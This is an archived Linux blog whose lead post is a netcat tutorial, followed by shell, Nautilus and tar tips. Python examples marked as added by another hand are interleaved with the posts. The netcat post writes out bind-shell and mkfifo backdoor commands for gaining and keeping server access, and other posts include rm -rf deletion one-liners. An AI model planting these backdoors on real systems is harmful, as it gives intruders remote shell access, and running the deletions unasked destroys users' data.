Monday 22 October 2012

Ninja Fu With Netcat - Hacker's Swiss Army Knife

Netcat is one of my favorite tools for network investigations and backdoor planting. Netcat is a seemingly simple but very powerful and useful tool for reading from and writing to network connections over TCP or UDP. In this post, we will see several examples of using netcat in different scenarios.

First of all, if you are using a distro like Ubuntu, it probably ships the OpenBSD netcat, which lacks the very useful switch that lets us execute an arbitrary command. netcat-traditional offers this switch, so for learning purposes you should install the netcat-traditional package with the command below on Ubuntu and its derivatives (however, beware of the inherent risk of this feature of the traditional netcat):

samar@samar-Techgaun:~$ sudo apt-get install netcat-traditional


Now you can use both the OpenBSD and the traditional versions as nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked to nc.openbsd (via /etc/alternatives/nc). If you want nc to permanently refer to nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):

samar@samar-Techgaun:~$ sudo update-alternatives --config nc


As I already said, netcat is a very useful tool for network-related work and hence is often referred to as the Hacker's Swiss Army Knife or the TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen servers, bind and reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool of hackers for gaining and maintaining access to servers.

Before beginning with the examples, I would like to point out that most of the time ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by the OS for core network services and you cannot bind to them without special privileges on the system.

Simple Netcat Listen Server


samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...


Simple Netcat Client


samar@samar-Techgaun:~$ nc -vvn 192.168.1.6 1234
(UNKNOWN) [192.168.1.6] 1234 (?) open


Once the client gets connected, the netcat listener might then look like this:

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.1.6] from samar-Techgaun.local [192.168.1.6] 38700


Noticed the port 38700 at the end? This is the port the client uses to talk to the server. Observe that the value is much higher than 1024; such ports are known as ephemeral ports.

Once the client and server are connected, you can type anything and press ENTER. The data is transmitted to the other end, which makes netcat a data transfer tool.
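To make the listener/client exchange above concrete, here is an added Python example (not code from the original post) that does on the loopback interface what the two nc invocations do: one side binds and accepts, the other connects and sends, and the listener records the client's source port, which is the ephemeral port that showed up as 38700 in the session above. The port number, payload and 127.0.0.1 address are constructed for the example; nothing here leaves the local machine.

```python
import socket
import threading

# Added example, not from the original post: what "nc -lvp PORT" and
# "nc HOST PORT" do underneath, run against the loopback interface so it
# works offline. The listener records the client's source port, which is
# the ephemeral port the netcat listener printed (38700 in the post).

def run_listener(ready, result, port=0):
    """Accept one connection on 127.0.0.1:port (0 = let the OS pick a port),
    read until the client closes, then record peer address and bytes seen."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    result["listen_port"] = srv.getsockname()[1]
    ready.set()                          # the client may dial now
    conn, peer = srv.accept()
    with conn:
        result["peer"] = peer            # (ip, ephemeral port chosen by the client's kernel)
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:                 # EOF: the client closed its end
                break
            chunks.append(data)
        result["received"] = b"".join(chunks)
    srv.close()

def run_client(host, port, payload):
    """Connect, send the payload, close: the equivalent of 'nc HOST PORT < file'.
    Returns the local (ephemeral) port the kernel assigned to this connection."""
    with socket.create_connection((host, port), timeout=5) as cli:
        local_port = cli.getsockname()[1]
        cli.sendall(payload)
    return local_port

def exchange(payload=b"I am DATA\n"):
    """Run listener and client in one process and return what each side saw."""
    ready = threading.Event()
    result = {}
    worker = threading.Thread(target=run_listener, args=(ready, result))
    worker.start()
    ready.wait(5)
    result["client_port"] = run_client("127.0.0.1", result["listen_port"], payload)
    worker.join(5)
    return result

if __name__ == "__main__":
    r = exchange()
    print(f"listening on [127.0.0.1] {r['listen_port']} ...")
    print(f"connect to [127.0.0.1] from {r['peer'][0]} {r['peer'][1]}")
    print(f"received {len(r['received'])} bytes: {r['received']!r}")
```

The port the listener sees in `peer` is the same one the client reads from its own socket, and it is always above 1024 because the kernel allocates it from the ephemeral range.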

Open Raw Connection With Netcat as client


samar@samar-Techgaun:~$ nc -vv ku.edu.np 80
Warning: inverse host lookup failed for 116.90.239.5: Unknown host
ku.edu.np [116.90.239.5] 80 (http) open
HEAD / HTTP/1.0\n\n

HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8

sent 21, rcvd 171


As seen above, I opened a raw connection to ku.edu.np and then issued the HEAD / HTTP/1.0\n\n request to obtain the HTTP headers. You can also see (notice the web server version and PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting; extend the idea to other services.

Web Server Example Using Netcat


samar@samar-Techgaun:~/Desktop/test$ { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < my_file)\r\n\r\n"; cat my_file; } | nc -lv -p 8080
listening on [any] 8080 ...


This example, taken from the Wikipedia entry on netcat, works as a one-shot web server that serves the content of my_file, which can be accessed from a web browser at http://server:8080.
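The banner-grabbing session and the one-shot web server above both come down to a few bytes of HTTP typed or piped by hand, so here is an added Python example (not from the original post) that builds the HEAD request, pulls the fingerprint-bearing headers out of a response, and assembles the same HTTP/1.0 response the one-liner emits, with Content-Length computed in bytes. The sample response is constructed for the example, modelled on the headers shown in the session above; the Content-Type and Connection headers in the built response are additions beyond what the one-liner sends.

```python
# Added example, not from the original post: the HTTP pieces the netcat
# sessions exercise, done by hand so the byte-level details are visible.

def head_request(host, path="/"):
    """The raw bytes nc sends when you type 'HEAD / HTTP/1.0' and press ENTER
    twice. HTTP/1.0 needs no Host header, but sending one keeps virtual hosts
    happy, so it is added here."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")

def parse_response_head(raw):
    """Split a raw HTTP response into (status_code, headers dict).
    Header names are lower-cased; anything after the blank line is ignored."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response: " + lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers

# The headers that leak software versions: exactly what you would want
# stripped or genericised on servers you are responsible for.
BANNER_HEADERS = ("server", "x-powered-by")

def banner(raw):
    """Fingerprint-bearing headers from a response, in a dict."""
    _code, headers = parse_response_head(raw)
    return {h: headers[h] for h in BANNER_HEADERS if h in headers}

def one_shot_response(body, content_type="text/html; charset=UTF-8"):
    """What the '{ echo -ne ...; cat my_file; } | nc -l -p 8080' one-liner
    emits. Content-Length must be the byte count of the body (wc -c), not the
    character count, and every header line ends in CRLF."""
    if isinstance(body, str):
        body = body.encode("utf-8")
    head = (
        "HTTP/1.0 200 OK\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("ascii") + body

# Constructed sample, modelled on the headers shown in the post (not a capture).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 22 Oct 2012 04:46:49 GMT\r\n"
    b"Server: Apache/2.2.3 (CentOS)\r\n"
    b"X-Powered-By: PHP/5.1.6\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    print(head_request("ku.edu.np"))
    print(banner(SAMPLE_RESPONSE))
    print(one_shot_response("I am DATA\n"))
```

The byte-versus-character distinction in one_shot_response is the usual mistake when people rewrite the one-liner: a body with non-ASCII text and a Content-Length taken from len() of a str makes browsers truncate or hang.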

File Transfer Using Netcat


To transfer a file from the server to the client, set up the server as below:

samar@samar-Techgaun:~$ cat my_file
I am DATA
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...


In the client end, do:

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234 > output.txt
samar-Techgaun.local [192.168.1.6] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt
I am DATA


Port Scanning With Netcat


samar@samar-Techgaun:~$ nc -nvz -w1 192.168.1.1 1-1024
(UNKNOWN) [192.168.1.1] 80 (http) open
(UNKNOWN) [192.168.1.1] 23 (telnet) open
(UNKNOWN) [192.168.1.1] 21 (ftp) open


If you wish to scan a number of hosts (or a full network), you can do something like this:

samar@samar-Techgaun:~/Desktop/test$ for ip in $(seq 1 254); do nc -nvz -w1 192.168.1.$ip 1-1024; done


In the first example, ports 1-1024 are scanned on the host 192.168.1.1, and in the second example the class C network 192.168.1.0/24 is scanned. However, netcat is by no means an advanced port scanner; tools such as nmap are much better suited to this job.
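Here is an added Python example (not from the original post) of the TCP connect check that nc -z -w1 performs, together with the question you actually want answered when you run it against your own hosts: which open ports are not on the allow-list? The demo binds a listener on an OS-chosen loopback port and scans a small window around it, so it runs offline; the allow-list and the window are constructed for the example.

```python
import socket

# Added example, not from the original post: the TCP connect check behind
# "nc -nvz -w1 HOST a-b", plus the defender's follow-up: is anything
# listening that is not on the allow-list?

def probe_ports(host, ports, timeout=1.0):
    """Attempt a full TCP handshake to each port (what -z does) with a
    per-port timeout (what -w1 does). Returns the ports that accepted."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 = connected; errno otherwise
                open_ports.append(port)
    return open_ports

def unexpected_listeners(host, ports, allowed, timeout=1.0):
    """Open ports that are not in the allow-list: the list to investigate."""
    return [p for p in probe_ports(host, ports, timeout) if p not in allowed]

def demo():
    """Offline self-check: bind one listener on an OS-chosen loopback port, scan
    a small window around it, and report the port and what the probe found."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    window = range(max(1, port - 2), min(65535, port + 2) + 1)
    try:
        found = probe_ports("127.0.0.1", window, timeout=0.5)
        unexpected = unexpected_listeners("127.0.0.1", window, allowed={port}, timeout=0.5)
    finally:
        srv.close()
    return port, found, unexpected

if __name__ == "__main__":
    port, found, unexpected = demo()
    print(f"listener on {port}; open in window: {found}; not allow-listed: {unexpected}")
```

A refused connection returns immediately, so the timeout only matters for filtered ports where no reply comes back; that is why a 1-1024 sweep against a firewalled host takes roughly a second per port with -w1.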

Spawn a process


The -e switch spawns a process for each incoming connection. On the server, type the command below:

samar@samar-Techgaun:~$ nc -lv -p 1234 -e /bin/bash
listening on [any] 1234 ...


At the other end, you just connect to the netcat service you just started and then issue any command that bash recognizes. Good for shells on servers, isn't it?

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
samar-Techgaun.local [192.168.1.6] 1234 (?) open
ls
my_file
output.txt


Netcat backdoor using mkfifo


Since a normal pipe (|) is not so reliable and works only in one direction, Linux offers named pipes (FIFOs), which can be exploited to create a more advanced backdoor on systems whose netcat lacks -e support.

samar@samar-Techgaun:~$ mkfifo /tmp/b4ck; sh /tmp/b4ck | nc -lvp 1234 > /tmp/b4ck
listening on [any] 1234 ...


At the other end, you just need to connect to the newly created netcat service port:

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
localhost [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
sent 3, rcvd 33


I hope this post gives some direction on how to work with netcat and shows that netcat is called the TCP/IP Swiss Army Knife for a reason. There are several other possibilities with netcat; explore to get more out of this awesome tool. ;)



Sunday 21 October 2012

Ubuntu Studio - Ubuntu Derivation For Audio Video & Graphics Editor

Ubuntu Studio is a variant of Ubuntu aimed at GNU/Linux audio, video and graphics enthusiasts as well as professionals. The distribution provides a collection of open-source applications for multimedia creation. Ubuntu Studio is a free, open source and powerful operating system created for creative people to produce exceptional art using the right set of tools for audio, video and graphics editing. As an officially recognized derivative of Ubuntu, Ubuntu Studio is supported by Canonical Ltd.

Ubuntu Studio is released every six months, but a long-term support (LTS) version is released only every two years.

Audio apps include Jack, Ardour, Audacity, QTractor, Hydrogen, Yoshimi, Rakarrack, Gladish, Puredata and several other apps available for download.

Graphical apps include Blender, Inkscape, GIMP, MyPaint and several other apps.

Video apps include Openshot video editor, FFMPEG, DVDStyler, and other apps.

Photography apps include Darktable, Shotwell, and several other useful apps.

Calibre, Scribus, LibreOffice and other apps are available to satisfy publishing needs.

Useful Links

Ubuntu Studio HOME

Ubuntu Studio Download

Ubuntu Studio Documentation



Enable Auto Correction Of Path In Bash

While using the cd command, it's normal to make mistakes when typing a directory path. You can enable auto-correction of directory paths by turning on a particular shell option.

Minor spelling mistakes are corrected automatically if the cdspell shell option is set using the shopt (SHell OPTions) command.

When you enable the cdspell shell option, the errors checked for are missing characters, repeated characters and transposed characters. When such an error is encountered, the corrected path is printed and the directory is changed successfully.

samar@samar-Techgaun:~$ shopt -s cdspell
samar@samar-Techgaun:~$ cd Desktp
Desktop
samar@samar-Techgaun:~/Desktop$ cd ../Deskotp/
../Desktop/
samar@samar-Techgaun:~/Desktop$ cd ../Desktoop
../Desktop
samar@samar-Techgaun:~/Desktop$


The line shopt -s cdspell enables the auto-correction while using cd command. The session above shows some of the corrections performed once we enabled the cdspell shell option.

If you want this setting to be turned on in every new shell, add the appropriate line to your profile using the command below:

samar@samar-Techgaun:~$ echo "shopt -s cdspell" >> ~/.bash_profile
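bash only applies cdspell in interactive shells, so the correction cannot be shown in a script; here instead is an added Python example (not bash's code, and not from the original post) of the same idea: a typed path component is matched against the real directory names when it differs by one missing character, one extra character or one adjacent transposition, and an ambiguous or larger error is left alone. The directory tree used in the usage below is a constructed fake; real_subdirs is what you would pass to run it against the filesystem.

```python
import os

# Added example, not from the original post: a cdspell-style correction of a
# typed path, one component at a time. Simplified relative to bash, which
# uses its own distance scoring; the three error classes are the same.

def one_edit_away(typed, real):
    """True if `real` is `typed` with one character inserted, one character
    dropped (e.g. a doubled letter) or two adjacent characters swapped.
    An exact match returns False: there is nothing to correct."""
    if typed == real:
        return False
    if len(typed) == len(real):
        diffs = [i for i, (a, b) in enumerate(zip(typed, real)) if a != b]
        return (len(diffs) == 2 and diffs[1] == diffs[0] + 1
                and typed[diffs[0]] == real[diffs[1]]
                and typed[diffs[1]] == real[diffs[0]])
    short, long_ = (typed, real) if len(typed) < len(real) else (real, typed)
    if len(long_) - len(short) != 1:
        return False
    i = 0
    while i < len(short) and short[i] == long_[i]:
        i += 1                           # common prefix
    return short[i:] == long_[i + 1:]    # rest must match after skipping one char

def correct_component(typed, candidates):
    """The unique candidate one edit away from `typed`, or None if there is no
    match or more than one (bash also refuses to guess when it is ambiguous)."""
    if typed in candidates:
        return typed
    hits = [c for c in candidates if one_edit_away(typed, c)]
    return hits[0] if len(hits) == 1 else None

def real_subdirs(path):
    """Subdirectory names of `path` on the real filesystem."""
    return [n for n in os.listdir(path) if os.path.isdir(os.path.join(path, n))]

def correct_path(typed_path, subdirs=real_subdirs, start="."):
    """Walk a relative path component by component, correcting each against the
    directory listing, as cd does with cdspell on. Returns the corrected path,
    or None when some component cannot be corrected."""
    current = start
    out = []
    for comp in typed_path.split("/"):
        if comp in ("", ".", ".."):
            out.append(comp)
            if comp:
                current = os.path.join(current, comp)
            continue
        fix = correct_component(comp, subdirs(current))
        if fix is None:
            return None
        out.append(fix)
        current = os.path.join(current, fix)
    return "/".join(out)

# Constructed fake tree so the example runs anywhere; keys are the paths
# correct_path will ask about when started from ".".
FAKE_TREE = {".": ["Desktop", "Documents"], "./Desktop": ["test"], "./Documents": []}

if __name__ == "__main__":
    fake = lambda p: FAKE_TREE.get(p, [])
    for typed in ("Desktp", "Deskotp/tset", "Desktoop", "Dxcuments"):
        print(f"{typed!r} -> {correct_path(typed, fake)!r}")
```

The three corrections in the session above (Desktp, Deskotp, Desktoop) are the missing, transposed and repeated cases; a wrong character (Dxcuments) is not one of the three classes the text lists, so it comes back as None.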


I hope this counts as a useful tip for Linux beginners ;)



Saturday 20 October 2012

Ubuntu Tweak Will No Longer Be Developed

It comes as very sad news, but the Ubuntu Tweak developer has decided to stop the development of Ubuntu Tweak. Tualatrix Chou writes in a blog post:

"I want to stop the development and maintenance of Ubuntu Tweak. This means you will not be able to use “Apps” (since it is a web service), I will not respond to bug reports, the last commit of the code will be: Add cache support for Apps, only available in Ubuntu 12.10, so sad."

While the developer gives the reason as "If making free software is not free any more, why still doing this?", I found the whole post quite cryptic.

One of his friends mentions that Ubuntu Tweak, despite being a great app, has not been included in the official sources, which is really depressing.



Tuesday 16 October 2012

Practical ls Command Examples For Fun & Profit

The power of Linux lies in the shell, through which we can perform complex jobs in no time. While the directory listing command 'ls' seems to be a very simple command, the Linux shell provides the power of switches and pipes to do almost anything from the terminal. Check out this list of practically useful examples using ls.

Display all files including hidden files/folders

ls -a


Display one file/folder per line

ls -1


Count number of files & folders

ls -1 | wc -l


Human readable file sizes (e.g. MB or GB)

ls -lh


Alphabetically sort the listing

ls -X


Only list the folders in current directory

ls -d */
ls -p | grep /




Display folders in the current directory whose names contain certain patterns

ls -l D* | grep :$
ls -l *a* | grep :$


List files by descending order of modification time

ls -lt
ls -l --sort=time #alternative long version


List files by descending order of creation time

ls -lct


List files in reverse order

ls -ltr
ls -l --sort=time --reverse #alternative long version


List files in descending order of file size

ls -lSh
ls -lh --sort=size
ls -lSh1 *.avi #largest AVI file is listed first
rm `ls -S1 | head -1` #delete largest file in current folder (breaks on names with spaces or newlines)


List files in ascending order of file size

ls -lShr
ls -lh --sort=size --reverse #alternative long version


Display directories in recursive manner

ls -R


Display the files/folders created today

ls -l --time-style=+%F | grep `date +%F`


Display the files/folders created this year

ls -l --time-style=+%y | grep `date +%y`


Any more examples that come to mind? Feel free to share them here ;)



Monday 15 October 2012

Useful Nautilus Shortcuts

Nautilus is the default file manager for the GNOME desktop and is used as the default file manager in several Linux distros such as Ubuntu. I love Nautilus because it's simple, friendly and clean, and supports local as well as remote file systems over different protocols. Moreover, there are several useful shortcuts that make life easier while using Nautilus.

Below is a list of the most helpful shortcuts for navigation and file management in Nautilus:

Ctrl + r: Refresh the current view

Ctrl + h: Toggle show/hide mode for hidden files

F9: Show/Hide the side pane

Ctrl + l: Activate location/url bar (You can then provide path to local or remote filesystems or quickly copy the absolute paths)

Alt + Up Arrow: Move up one directory level

Alt + Down Arrow: Move down one directory level (the directory to be entered should be selected for this to work)

Alt + Left Arrow: Go back to the previous folder in view

Alt + Right Arrow: Go forward

Ctrl + Shift + n: Create a new empty directory

Ctrl + (+ / -): Zoom in (+) or zoom out (-)

Ctrl + 0: Zoom to normal state

Alt + Enter: View selected file/folder properties

F2: Rename selected file/folder

Ctrl + Shift + Drag file/folder: Create symbolic link to file/folder

Ctrl + f: Search for files/folders

Ctrl + s: Select files based upon templates (eg. select all pdf files using *.pdf)

Ctrl + 1: Toggle view as icons

Ctrl + 2: Toggle view as lists

Ctrl + 3: Toggle compact view

Ctrl + w: Close current nautilus window

Ctrl + Shift + w: Close all open Nautilus windows

Ctrl + T: Open new tab

Alt + HOME: Navigate to HOME folder

F6: Toggle between side pane and central pane

Know more shortcuts? Share them in the comments :)



Saturday 13 October 2012

How To Exclude Directory While Compressing With Tar

Quite a handy and useful tip here. Often you want to compress files and folders, but there are cases when you want to compress your data while excluding some of the directories. The tar command makes this easy by providing an exclusion switch.

I was actually backing up data I had downloaded on a remote server and wanted a copy of the backup tar file on my system as well. But all those images that resided in the folders deep inside were not necessary for me. So all I did was something like this:

adm@RServ:~$ tar cvf backup.tar test --exclude='image*'


The above command effectively excludes all the sub-directories of the test directory having the string image in their name (e.g. image, images, images_old in my case) and creates the backup.tar file. Moreover, the --exclude switch also accepts regular expressions, so you can specify a regex to filter the directories. As an example, the command below excludes the directories a, b, c, d and e while creating the tarball.

adm@RServ:~$ tar cvf backup.tar test --exclude='[a-e]'
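When the same backup is done from a script rather than typed by hand, Python's tarfile module can apply the exclusion through the filter argument of add(). Here is an added example (not from the original post) that does this for the two patterns above. Note that GNU tar's --exclude takes shell wildcard patterns (fnmatch-style, matched against any component of the path by default), which is what the example reproduces: image* drops images and images_old wherever they sit in the tree, and [a-e] drops any component that is a single letter a to e. The directory layout is constructed for the example inside a temporary directory and removed afterwards.

```python
import fnmatch
import io
import os
import tarfile
import tempfile

# Added example, not from the original post: "tar cvf backup.tar test
# --exclude=PATTERN" done with Python's tarfile. The exclusion is matched
# per path component with shell wildcards, approximating tar's default
# unanchored --exclude behaviour.

EXCLUDE_PATTERNS = ["image*"]          # same pattern as the post's first command

def excluded(name, patterns):
    """True if any component of the archive member name matches any pattern."""
    return any(fnmatch.fnmatch(part, pat)
               for part in name.split("/") for pat in patterns)

def make_backup(src_dir, patterns, out_stream):
    """Write a tar of src_dir to out_stream, dropping excluded entries.
    Returns the member names that were kept, in archive order."""
    kept = []

    def keep(info):
        if excluded(info.name, patterns):
            return None                 # None from the filter drops the entry (and its subtree)
        kept.append(info.name)
        return info

    arcname = os.path.basename(src_dir.rstrip("/"))
    with tarfile.open(fileobj=out_stream, mode="w") as tar:
        tar.add(src_dir, arcname=arcname, filter=keep)
    return kept

def build_sample_tree(root):
    """Constructed sample layout (not the author's data) under root/test."""
    for d in ("test/docs", "test/images", "test/docs/images_old", "test/a"):
        os.makedirs(os.path.join(root, d), exist_ok=True)
    for f in ("test/readme.txt", "test/docs/notes.txt", "test/images/1.png",
              "test/docs/images_old/2.png", "test/a/image.txt"):
        with open(os.path.join(root, f), "w") as fh:
            fh.write("x\n")

def demo(patterns=EXCLUDE_PATTERNS):
    """Build the sample tree in a temp dir, archive it with the exclusion, and
    return (names the filter kept, names actually present in the archive)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        buf = io.BytesIO()
        kept = make_backup(os.path.join(tmp, "test"), patterns, buf)
        buf.seek(0)
        with tarfile.open(fileobj=buf, mode="r") as tar:
            members = tar.getnames()
    return sorted(kept), sorted(members)

if __name__ == "__main__":
    for pats in (["image*"], ["[a-e]"]):
        kept, _members = demo(pats)
        print(f"--exclude={pats}: {kept}")
```

Returning None from the filter for a directory stops tarfile from descending into it, so images/1.png never even gets visited, which is also why the kept list and the archive's member list agree exactly.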


You can exploit this switch to ease many of your daily tasks. I hope this helps :)



Empty Trash From Command Line In Ubuntu

The CLI is such a sexy thing, so why bother with the GUI, even for cleaning up your trash? In this post, you will see how to empty the trash in Ubuntu from the command line.

The trash you see in the GUI is nothing but a view of the files deleted by users, which are temporarily moved to a special location in the user's home directory. For any user, the trash location is ~/.local/share/Trash/. That is, whatever a user deletes gets saved in this location.

samar@samar-Techgaun:~$ rm -rf ~/.local/share/Trash/
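Before wiping the trash it is worth knowing what is in it, and the desktop keeps that information next to the files: under ~/.local/share/Trash/ there is a files/ directory with the deleted items and an info/ directory with one NAME.trashinfo record per item giving the original path and deletion date (the FreeDesktop trash specification). Here is an added Python example (not from the original post) that lists those records and then empties the two directories while leaving them in place. The demo builds a constructed trash layout in a temporary directory and never touches the real Trash; the file name, original path and date in it are invented.

```python
import os
import shutil
import tempfile

# Added example, not from the original post: inspect and empty a trash
# directory laid out per the FreeDesktop trash spec (files/ + info/).

TRASH_DIR = os.path.expanduser("~/.local/share/Trash")

def list_trash(trash_dir=TRASH_DIR):
    """One dict per entry in files/, joined with its info/NAME.trashinfo record.
    Path values in .trashinfo are percent-encoded by the spec; left as written here."""
    files_dir = os.path.join(trash_dir, "files")
    info_dir = os.path.join(trash_dir, "info")
    entries = []
    if not os.path.isdir(files_dir):
        return entries
    for name in sorted(os.listdir(files_dir)):
        entry = {"name": name, "original": None, "deleted": None}
        info_path = os.path.join(info_dir, name + ".trashinfo")
        if os.path.isfile(info_path):
            with open(info_path, encoding="utf-8") as fh:
                for line in fh:
                    key, _, value = line.strip().partition("=")
                    if key == "Path":
                        entry["original"] = value
                    elif key == "DeletionDate":
                        entry["deleted"] = value
        entries.append(entry)
    return entries

def empty_trash(trash_dir=TRASH_DIR):
    """Delete the contents of files/ and info/ but keep the directories, so the
    desktop does not need to recreate them. Returns the number of items removed."""
    removed = 0
    for sub in ("files", "info"):
        d = os.path.join(trash_dir, sub)
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            p = os.path.join(d, name)
            if os.path.isdir(p) and not os.path.islink(p):
                shutil.rmtree(p)        # a trashed directory, with its subtree
            else:
                os.remove(p)            # regular file or symlink
            if sub == "files":
                removed += 1
    return removed

def demo():
    """Constructed trash layout in a temp dir (never the real Trash)."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "files"))
        os.makedirs(os.path.join(tmp, "info"))
        with open(os.path.join(tmp, "files", "notes.txt"), "w") as fh:
            fh.write("old notes\n")
        with open(os.path.join(tmp, "info", "notes.txt.trashinfo"), "w") as fh:
            fh.write("[Trash Info]\nPath=/home/samar/notes.txt\n"
                     "DeletionDate=2012-10-13T10:00:00\n")
        before = list_trash(tmp)
        removed = empty_trash(tmp)
        after = list_trash(tmp)
        dirs_kept = all(os.path.isdir(os.path.join(tmp, s)) for s in ("files", "info"))
    return before, removed, after, dirs_kept

if __name__ == "__main__":
    before, removed, after, _ = demo()
    for e in before:
        print(f"{e['name']}  (was {e['original']}, deleted {e['deleted']})")
    print(f"removed {removed} item(s); remaining: {after}")
```

Removing only the contents, rather than the Trash directory itself as the rm -rf above does, keeps the files/ and info/ pair intact for the next deletion; trash on other mounted volumes lives in a .Trash-UID directory at that volume's root and is not covered here.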


I hope this becomes useful :)

